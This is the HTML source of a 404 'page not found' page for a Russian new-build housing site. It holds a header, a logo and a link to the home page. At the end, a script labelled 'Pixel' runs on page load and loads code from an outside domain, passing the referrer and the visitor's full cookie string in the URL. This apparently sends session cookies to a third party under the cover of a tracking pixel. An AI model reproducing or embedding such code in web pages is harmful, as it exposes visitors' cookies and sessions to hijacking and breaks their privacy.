<!DOCTYPE html>
<html lang="ru">

    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
      <meta http-equiv="X-UA-Compatible" content="ie=edge">
      <link href="/assets/css/style.css?v=<?=filemtime($_SERVER['DOCUMENT_ROOT'].'/assets/css/style.css')?>" rel="stylesheet">

      <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
      <title>Проновостройки. Страница не найдена</title>
    </head>
        <body>
            <div style="display:none">
                <include src="/assets/img/sprite.svg"></include>
            </div>
            <header class="header-catalog">
                <img src="/assets/img/close__btn.png" alt="">
                <div class="header-catalog__wrap">
                    <div class="header-catalog__logo">
                        <a href="/"><img src="/assets/img/logo.svg" alt="logo"></a>
                    </div>
                    
                </div>
                <hr class="hr"></hr>
            </header> 
            <center><h1>Страница не найдена.</h1></center>
            <center class="catalog-nav__item"><a href="/">Перейти на главную</a></center>
        </body>
        <style>
            @media (max-width: 1024px){
                .catalog-nav__item a{
                    color: #000;
                    display: block;
                }
            }
        </style>
        <!-- Pixel -->
   <script type="text/javascript">
        (function (d, w) {
            var n = d.getElementsByTagName("script")[0],
                s = d.createElement("script"),
                f = function () { n.parentNode.insertBefore(s, n); };
                    s.type = "text/javascript";
                    s.async = true;
                    s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie);

                    if (w.opera == "[object Opera]") {
                        d.addEventListener("DOMContentLoaded", f, false);
                    } else { f(); }
        })(document, window);
    </script>
    <!-- /Pixel -->
</html>    